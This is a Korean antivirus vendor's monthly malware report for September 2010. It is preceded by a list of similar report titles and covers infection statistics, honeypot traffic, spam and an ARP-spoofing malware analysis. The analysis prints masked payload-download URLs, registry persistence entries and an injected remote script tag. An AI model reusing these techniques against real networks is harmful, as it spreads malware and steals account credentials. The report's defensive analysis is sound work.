<4D F736F F D2039BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

Similar documents
<4D F736F F D2038BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

목차 Part Ⅰ 3 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

<4D F736F F D2036BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

<4D F736F F D2035BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

목차 Part Ⅰ 12 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

목차 Part Ⅰ 1 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

목차 Part Ⅰ 7 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

목차 Part Ⅰ 8 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

목차 Part Ⅰ 5 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

목차 Part Ⅰ 2 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

목차 Part Ⅰ 10 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

<4D F736F F D2031BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

*2008년1월호진짜

목차 Part Ⅰ 8 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

목차 Part Ⅰ 11 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

목 차 1. 개 요 배경 요약 정보 대상시스템 원리 공격 기법 및 기본 개념 Heap Spray Font 공 격..

!K_InDesginCS_NFH

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

2006_8_14 (8_17 updated) ms ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp

목차 Part Ⅰ 1 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

목차 Part Ⅰ 9 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

목차 Part Ⅰ 5 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율젂월비교... 4 (4) 월별피해싞고추이... 5 (5) 월별악성코드 DB 등록추이...

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

유포지탐지동향

untitled

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

ActFax 4.31 Local Privilege Escalation Exploit

*****

월간 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉

*

보안 위협 분석 보고서

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

#WI DNS DDoS 공격악성코드분석

2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

PowerPoint 프레젠테이션

CLX8380_KR.book

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

AhnLab_template

08_spam.hwp

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

6강.hwp


Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-

Ⅰ. 이달의 보안 동향 1. 악성코드 동향 아래 표는 악성코드의 주요 동향을 파악하기 위하여, 악성코드별 변종을 종합한 악성코드 대표진단명 감염보고 Top20이다. 악성코드 통계 2010년 10월 악성코드 통계현황은 다음과 같다. [표 1-2] 악성코드 대표진단명 감염

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하

DR-M140 사용 설명서

Windows 8에서 BioStar 1 설치하기

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

Security Trend ASEC Report VOL.56 August, 2014

ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성

목차 Part Ⅰ 4 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율젂월비교... 4 (4) 월별피해싞고추이... 5 (5) 월별악성코드 DB 등록추이...

Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc. All rights res

untitled

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대

server name>/arcgis/rest/services server name>/<web adaptor name>/rest/services ArcGIS 10.1 for Server System requirements - 지

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for

SKINFOSEC_TECH_005_China Bot_가칭_ 악성코드 분석_v0.3.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

목차 Part Ⅰ 6 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율젂월비교... 4 (4) 월별피핬신고추이... 5 (5) 월별악성코드 DB 등록추이...

1. 제품 개요 WeGuardia WIPS V2.0(이하 TOE)은 특정 조직에서 운영되는 무선랜에 대한 지속적인 모니터을 통해 내 외부로부터 발생할 수 있는 각종 침입을 탐지 및 차단하여 내부의 네트워크를 보호하는 무선침입방지시스템이다. TOE의 세부 식별자 및 배포

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 13 - 경유지

<31305FBEC6C0CCC5DB2E687770>

<C0CCC8ADC1F82E687770>

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요? 3 Q5. 보안패치가됐는지어떻게확인하나요? 5 Q6. 스마트폰도랜섬웨

ìœ€íŁ´IP( _0219).xlsx

ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서

ASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작

Security Trend ASEC REPORT VOL.68 August, 2015

공지사항

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

AhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안철수연구

5th-KOR-SANGFOR NGAF(CC)

. PC PC 3 [ ] [ ], [ ] [ ] [ ] 3 [ ] [ ], 4 [ ] [ ], 4 [Internet Protocol Version 4 (TCP/IPv4)] 5 [ ] 6 [ IP (O)], [ DNS (B)] 7 [ ] 한국어 -

Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 2009 년 11 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 년 11월의악성코드감염보고는 Win32/Induc이 1위를차지하고

[ 악성코드상세분석보고서 ] SK 커뮤니케이션즈해킹관련상세분석보고서 nateon.exe 대응 2 팀

TGDPX white paper

Assign an IP Address and Access the Video Stream - Installation Guide

별지 제10호 서식

< FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>

리눅스 취약점대응방안권고 / KISA 취약점점검팀 영향받는플랫폼 OS, FAQ 추가 개요 미국보안회사 에의해 시스템의 라이브러리 의특정함수에서임의코드를실행할수있는취약점이공개 해당취약점은 CVE 지정, 도메인네임을

³»Áö¼öÁ¤

..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * A

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

PowerPoint Template

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 운영체제의버전확인은어떻게확인하나요? 3 Q5. 보안패치는어떻게하나요? 4 Q6. 보안패치가됐

고객 사례 | Enterprise Threat Protector | Akamai

Transcription:

목차 Part Ⅰ. 9 월의악성코드통계 1. 악성코드통계... 2 (1) 감염악성코드 Top 15... 2 (2) 카테고리별악성코드유형... 3 (3) 카테고리별악성코드비율전월비교... 3 (4) 월별피해신고추이... 4 (5) 월별악성코드 DB 등록추이... 4 2. 악성코드이슈분석 온라인계정비밀번호를훔치는 ARP 스푸핑악성코드... 5 3. 허니팟 / 트래픽분석... 9 (1) 상위 Top 10 포트... 9 (2) 상위 Top 5 포트월별추이... 9 (3) 악성트래픽유입추이...10 4. 스팸메일분석...11 (1) 일별스팸및바이러스통계현황...11 (2) 월별통계현황...11 (3) 스팸메일내의악성코드현황...12 Part Ⅱ. 9 월의보안이슈돋보기 1. 9 월의보안이슈...13 2. 9 월의취약점이슈...15 페이지 1

Part Ⅰ 9월의악성코드통계 1. 악성코드통계 (1) 감염악성코드 Top 15 순위악성코드진단명카테고리 [2010 년 9 월 1 일 ~ 2010 년 9 월 30 일 ] 합계 ( 감염자수 ) 1 2 V.ADV.Admoke Adware 55,195 2 1 S.SPY.Lineag-GLG Spyware 46,529 3 7 V.DWN.el.39xxxx Trojan 33,490 4 2 V.TRJ.Patched.imm Trojan 27,240 5 1 A.ADV.BHO.IESearch Adware 26,463 6 2 S.SPY.OnlineGames.kb Spyware 21,642 7 4 V.WOM.Conficker Worm 21,728 8 New Trojan.Generic.4667513 Trojan 20,078 9 New S.SPY.OnlineGames-H Spyware 19,099 10 New Trojan.Generic.4758434 Trojan 14,837 11 6 V.DWN.Agent.Pinsearch Trojan 14,729 12 New Adware.Generic.139910 Adware 13,050 13 New Backdoor.Generic.456135 Backdoor 11,707 14 5 Trojan.Generic.4567643 Trojan 8,132 15 New Trojan.Generic.4755171 Trojan 8,086 KT 쿡인터넷닥터와 XPEED 알약프리미엄사용자의감염통계를합산에서산출한순위임 감염악성코드 Top 15는사용자 PC에서탐지된악성코드를기반으로산출한통계이다. 9월의감염악성코드 TOP 15는 V.ADV.Admoke이 55,195건으로 TOP 15 중 1위를차지하였으며, S.SPY.Lineag-GLG가 46,529건으로 2위, V.DWN.el.39xxxx가 33,490건으로 3위를차지하였다. 이외에도 9월에새로 Top 15에진입한악성코드는 6종이다. 최근악성코드중에는 MS 인터넷익스플로러취약점 (MS10-002, MS10-018) 을이용해 PC에침투하고, ARP Spoofing 공격과온라인게임계정을탈취하는악성코드의감염이급증하고있어 PC 사용자들의주의가필요하다. 페이지 2

(2) 카테고리별악성코드유형 웜 (Worm) 6% 애드웨어 (Adware) 28% 백도어 (Backdoor) 3% 트로이목마 (Trojan) 37% 스파이웨어 (Spyware) 26% 트로이목마 (Trojan) 스파이웨어 (Spyware) 애드웨어 (Adware) 하이재커 (Hijacker) 웜 (Worm) 취약점 (Exploit) 바이러스 (Virus) 백도어 (Backdoor) 악성코드유형별비율은트로이목마 (Trojan) 가 37% 로가장많은비율을차지하고, 애드웨어 (Adware) 가 28%, 스파이웨어 (Spyware) 가 26% 의비율을각각차지하고있다. 이번에 37% 의가장높은비율을차지한트로이목마 (Trojan) 는보안이취약한웹사이트에서유포된경우가많이발견되었다. (3) 카테고리별악성코드비율전월비교 하이재커 (Hijacker) 트로이목마 (Trojan) 취약점 (Exploit) 웜 (Worm) 애드웨어 (Adware) 스파이웨어 (Spyware) 백도어 (Backdoor) 0.00% 0.00% 0.00% 0.00% 4.45% 6.35% 0.00% 3.42% 13.78% 27.69% 15.29% 25.52% 66.48% 37.01% 8 월 9 월 바이러스 (Virus) 0.00% 0.00% 0% 20% 40% 60% 80% 100% 카테고리별악성코드비율을전월과비교하면, 트로이목마 (Trojan) 의경우전달에비해 29.47% 정도비율로감소하였고, 스파이웨어의경우 (Spyware) 10.23% 정도증가하였다. ( 바이러스, 취약점등의경우 Top15를기준으로했을때차지하는비율이없다는것이다.) 페이지 3

(4) 월별피해신고추이 [2009 년 10 월 ~ 2010 년 9 월 ] 10 월 11 월 12 월 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 알약사용자의신고를합산에서산출한결과임 월별피해신고추이는알약사용자의신고를합산해서산출한결과로써, 월별신고건수를나타내는그래프이다. 9월의경우전달 (8월) 보다신고건수가감소하였다. (5) 월별악성코드 DB 등록추이 [2009 년 10 월 ~ 2010 년 9 월 ] 200910 200911 200912 201001 201002 201003 201004 201005 201006 201007 201008 201009 Adware Spyware Hijacker KeyLogger Exploit RAT Trojan Worm Backdoor Downloader Dropper Misc 9월은백도어 (Backdoor) 계열의변종파일이가장많이등록되었으며, 다음으로웜 (Worm) 이 많이등록되었다. 그중에서도임의의포트 (Port) 를오픈 (Open) 하여공격자의접속을대기하는 V.BKD.PcClient.vx이가장많이등록되었다. 페이지 4

Part Ⅰ 9 월의악성코드통계 2. 악성코드이슈분석 온라인계정비밀번호를훔치는 ARP 스푸핑악성코드 최근 ARP Spoofing과 MS 취약점을이용해온라인계정과관련된비밀번호를훔치는악성코드가발견되었다. 이악성코드의특징은감염된호스트와동일네트워크에있으면인터넷만해도감염된다는것이다. 어떻게이런일이가능한지분석해보도록한다. 1) 전체흐름악성코드전파의시작은 yahoo.js 파일이다. 이파일은 ad.htm, news.html, count.html 에접속하는스크립트파일이다. 접속하는페이지는최근 MS 취약점을사용하여 s.exe를다운받아서실행하는일을한다. s.exe는두개의파일을다운받고실행한다. 2) S.exe S.exe는드롭퍼 (dropper) 다. 파일내부에있는리소스영역에서 DLL 파일을 Drop하여아래경로에생성한다. %USERPROFILE%\Microsoft\smx4pnp.dll 그리고부팅시자동으로실행되기위해레지스트리를등록한다. SOFTWARE\Microsoft\Windows\CurrentVersion\Run smx4pnp;rundll32.exe "%USERPROFILE%\Microsoft\smx4pnp.dll", Launch 페이지 5

마지막으로 rundll32.exe를이용하여 DLL을실행하고자기자신 (s.exe) 을삭제한다. 대부분의악성코드는자기자신을삭제하는데.bat 파일을만들어서실행하지만이번악성코드의경우는 RTL(Return To Library) 이라는기술을사용했다. 이기술은 2000년대초반시스템해킹에서여러개의함수를순차적으로실행하기위한기법으로많이사용되었다. 그코드는아래와같다. 아무프로세스 ( 여기선 calc.exe) 를 SUSPENDED 상태로생성하고 EIP와 ESP를설정하고스레드를실행한다. EIP를 WaitForSingleObject() 함수로설정했기때문에이함수가먼저실행되고만들어진스택에의해서 DeleteFileW 함수, 마지막으로 ExitProcess 함수가인자값과함께실행된다. 3) smx4pnp.dll smx4pnp.dll는다운로더 (downloader) 다. 아래사이트에서악성파일의경로가적혀있는파일을다운받는다. http://k***i.i*:8*/s.txt 위파일에는악성파일이있는인터넷경로가적혀있고이것을다운받아실행한다. 136 http://98.126.**.***:8*/ma.exe http://98.126.**.***:8*/tt.exe smx4pnp.dll는악성코드를다운받아서실행하는일만한다. 4) ma.exe ma.exe는드롭퍼 (dropper) 이며 %SYSTEM% 에 xcvaver0.dll파일을생성한다. 그리고레지스트리에 CLSID를등록하고 ma.exe 파일을실행한경로와 xcvaver0.dll 파일을생성한경로에대한정보를써놓는다. 페이지 6

HCR\CLSID\{C3D16072-B843-2E1B-450B-50EADDC8EB63} VcmnDllModuleName;C:\WINDOWS\system32\xcvaver0.dll VcmnExeModuleName; C:\Documents and Settings\Administrator\ 바탕화면 \ma.exe VcmnSobjEventName;BNMJJHYUIOPTREMN_0 그리고생성한 xcvaver0.dll을로드하고 Vout() 함수를실행한다. 마지막으로 explorer.exe 프로세스에생성한 xcvaver0.dll 파일을인젝션 (infection) 하여 DLL이해당프로세스에서실행되도록한다. 5) xcvaver0.dll xcvaver0.dll은스파이웨어 (spyware) 다. 아이온, 던전앤파이터, 메이플스토리의계정정보를탈취한다. 다음사이트에서특정단어를검사해서계정을정보를얻는다. 사이트명 찾는단어 plaync.co.kr aion.plaync.jp df.nexon.com maplestory.nexon.com id pwd account password 6) tt.exe tt.exe는드롭퍼 (dropper) 다. 가장핵심이되는일인 ARP Spoofing을하는 nvsvc.exe 파일과이파일을실행하는데필요한 wpcap 관련라이브러리를드롭한다. 생성하는위치와파일목록은다음과같다. %SYSTEM%\nvsvc.exe : ARP Spoofing 하는악성파일 %SYSTEM%\Packet.dll : wpcap 관련라이브러리 %SYSTEM%\WanPacket.dll : wpcap 관련라이브러리 %SYSTEM%\wpcap.dll : wpcap 관련라이브러리 레지스트리 Run 에등록하고자기자신을삭제한다. HCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nvsvc;%system%\nvsvc.exe 7) nvsvc.exe nvsvc.exe은 ARP Spoofing을사용하여외부로부터오는 http 패킷에악성스크립트를삽입하는일을한다. 페이지 7

호스트 PC의 IP 주소를얻어온다. 그리고 c클래스 (xxx.xxx.xxx.1~224) 를순차적으로 ARP Spoofing 공격을하여 ARP cache를감염시킨다. 그리고아래와같이필터를설정하여패킷을받을수있도록한다. ether dst [MAC Address] and not dst [IP Address] ARP cache가감염된 host에서 http request를보내고 response를받을때패킷을변조한다. 헤더바로아래에다음의코드를삽입하여사이트에볼때마다삽입된코드를실행하도록한다. <script src=http://www.fxxxxx.com/js/yahoo.js></script> 이파일은처음에알아본파일이다. 결국악성스크립트가실행되어해당컴퓨터에악성코드가설치되게된다. 그래서단한대의컴퓨터만악성코드에감염되어있어도네트워크상의모든컴퓨터를감염시킬수있다. 이악성코드는 ARP Spoofing과최근 MS 취약점을이용하여전파된다. 네트워크상에감염된호스트가한대만있어도모두감염되는특징이있다. 하지만 MS 업데이트만잘하면이러한감염을막을수있기때문에업데이트알람이뜨면바로설치하는것이좋다. 페이지 8

Part Ⅰ 9월의악성코드통계 3. 허니팟 / 트래픽분석 (1) 상위 Top 10 포트 TCP 3306 5% TCP 1433 4% TCP 21 13% TCP 135 73% 135 21 3306 1433 25 3389 80 23 4899 110 8월에도지속적으로윈도우자체의취약점을대상으로한 TCP 135 포트침입시도가가장많았다. 지난달에비해서는 14% 감소하였지만 TCP 21번에대한침입시도가전달에비해 4 배이상증가하였다. TCP 135 포트에대한침입시도는 RPC(Remote Procedure Call) 버퍼오버런이가능한보안취약점을주로이용한다. (2) 상위 Top 5 포트월별추이 [2010 년 7 월 ~ 2010 년 9 월 ] 135 21 1433 25 3306 2010-07 2010-08 2010-09 알려진취약점을노리는패킷은약간감소했지만 FTP나스팸릴레이를위한서버의권한획득시도가증가했다. 계절적원인과더불어 PC사용이더욱증가하는때가되었으므로, 관리자는쉬운패스워드, 프로그램의취약점등기존에알려진모든보안위협에대해한번더점검해야겠다. 페이지 9

(3) 악성트래픽유입추이 [2009 년 4 월 ~ 2010 년 9 월 ] 2010-04 2010-05 2010-06 2010-07 2010-08 2010-09 전체적인악성트래픽의유입양은전달과비슷하였다. 최근이란의핵시설과같은교통, 발전, 공장자동화같은 SCADA 시스템을노리는 Stuxnet 악성코드가등장하면서다이하드 4.0 같은영화에서나나올법한해커가마음대로교통망을통제하거나, 발전소와같은기간산업을노리는일이실제적인위협으로등장하게되었다. 따라서나자신과국가사이버안보를위해지금사용하는 PC는물론일상생활에서더욱보안에신경써야할것이다. 페이지 10

Part Ⅰ 9월의악성코드통계 3. 스팸메일분석 (1) 일별스팸및바이러스통계현황 40,000 35,000 30,000 25,000 20,000 15,000 10,000 5,000 0 바이러스스팸 2010-09-01 2010-09-03 2010-09-05 2010-09-07 2010-09-09 2010-09-11 2010-09-13 2010-09-15 2010-09-17 2010-09-19 2010-09-21 2010-09-23 2010-09-25 2010-09-27 2010-09-29 일별스팸및바이러스통계현황그래프는하루에수신된악성코드첨부, 스팸메일의개수를나타낸그래프이다. 9월의스팸및바이러스메일의특이사항은페이스북이용자를노린악성코드감염으로의심되는현상이많이발견되었다. 페이스북이용자들간에의미없는메일이쇄도하는사례가속속발견되었으며, 메일에는별다른내용이없는상태로제목이 `Hello` `Hi` `Cool` 등다양하였다. 첨부파일이없어도간단한코드의자동실행만으로도감염되는악성코드도많기때문에받는즉시삭제하는편이안전하다. (2) 월별통계현황 [2010 년 4 월 ~ 2010 년 9 월 ] 2,500,000 1.5% 2,000,000 1.5% 1,500,000 1,000,000 98.4 2.5% 2.6% 98.5 2.6% 2.3% 바이러스 스팸 500,000 97.4 97.3 97.3 97.6 0 4 월 5 월 6 월 7 월 8 월 9 월 페이지 11

월별통계현황은악성코드첨부및스팸메일이전체메일에서차지하는비율을나타내는그래프이다. 9월의스팸메일은 97.6%, 바이러스메일은 2.3% 를차지하였다. 8월에비해스팸메일이 0.3% 증가, 바이러스메일이 0.3% 비율로감소하였다. (3) 스팸메일내의악성코드현황 [2010 년 9 월 1 일 ~ 2010 년 9 월 30 일 ]ff 순위 악성코드진단명 메일수 [ 개 ] 비율 [%] 1 W32/Virut-T 6,902 41.00% 2 W32/MyDoom-H 3,008 17.87% 3 Mal/ZipMal-B 1,774 10.54% 4 JS/WndRed-B 884 5.25% 5 Mal/BredoZp-B 707 4.20% 6 W32/Mytob-C 645 3.83% 7 W32/Sality-I 426 2.53% 8 W32/Bagz-C 419 2.49% 9 W32/Mytob-R 287 1.70% 10 Troj/CryptBx-ZP 271 1.61% 스팸메일내의악성코드현황은 9월바이러스메일에서발견된악성코드중 Top 10을뽑은그래프이다. 현재 W32/Virut-T이 41% 로계속 1위를차지하고있다. 2위는 17.87% 를차지한 W32/MyDoom-H, 3위는 10.54% 를차지한 Mal/ZipMal-B이다. 9월은 SNS(social Network Service) 서비스인페이스북 (Facebook) 에서 `Hello` `Hi` `Cool` 제목으로가짜백신을설치하는악성메일유포가많았다. 페이지 12

Part Ⅱ 9 월의이슈돋보기 1. 9 월의보안이슈 9월에는 Adobe 최신제로데이취약점을이용하는골프클리닉 PDF 악성코드출현과이란원자력발전소에서 SCADA 시스템을목표로한 Stuxnet 악성코드의발견, 온라인계정의비밀번호를훔치는 ARP Spoofing 악성코드의유행에관한보안이슈가있었습니다. 어도비최신제로데이취약점을이용하는골프클리닉 PDF 악성코드주의당신의골프점수를향상시켜줄수있는세계적인강사데이비드레드베터 (David Leadbetter) 의골프클리닉내용으로위장한메일속에어도비아크로뱃 (Adobe Acrobat) 제로데이취약점을이용하는악성 PDF 파일이첨부되어유포한사례를발견했습니다. 취약점 (CVE-2010-2833) 은어도비아크로뱃의 TrueType Font(TTF) 처리과정에서원격코드를실행시킬수있는문제이며 10월 7일에공식보안패치가발표되었습니다. 악성 PDF 파일은새로운다운로더 (Downloader) 악성코드를다운로드한후, 다운받은다운로더는새로운악성코드를내려받기위해대기하는특징을가지고있습니다. < 그림 : 어도비아크로뱃 (Adobe Acrobat) 제로데이취약점 (CVE-2010-2833) 을악용한데이비드레드베터 (David Leadbetter) 골프클리닉악성코드이메일 > 이란핵시설과여러 SCADA 시스템을타켓으로한 Stuxnet 악성코드추석연휴기간동안외신을통해인터넷과연결되지않은 SCADA 시스템을공격하는 Stuxnet 악성코드가이란의원자력발전소에서발견되었다는보도가특히많았습니다. Stuxnet 악성코드는윈도우와 Siemense SCADA 시스템의취약점, USB 자동실행 (Autorun) 을통해유포되며, 알약에서는이미 7월에 Stuxnet의엔진업데이트를완료했습니다. 국내에서도 Stuxnet에감염된 PC가존재한것으로파악되고있으며, 이미감염된 PC에서는알약과 Bitdefender 전용백신을통해 Stuxnet 악성코드를치료하실수있습니다. 알약보안공지 : http://alyac.altools.co.kr/securitycenter/analysis/noticeview.aspx?id=62 페이지 13

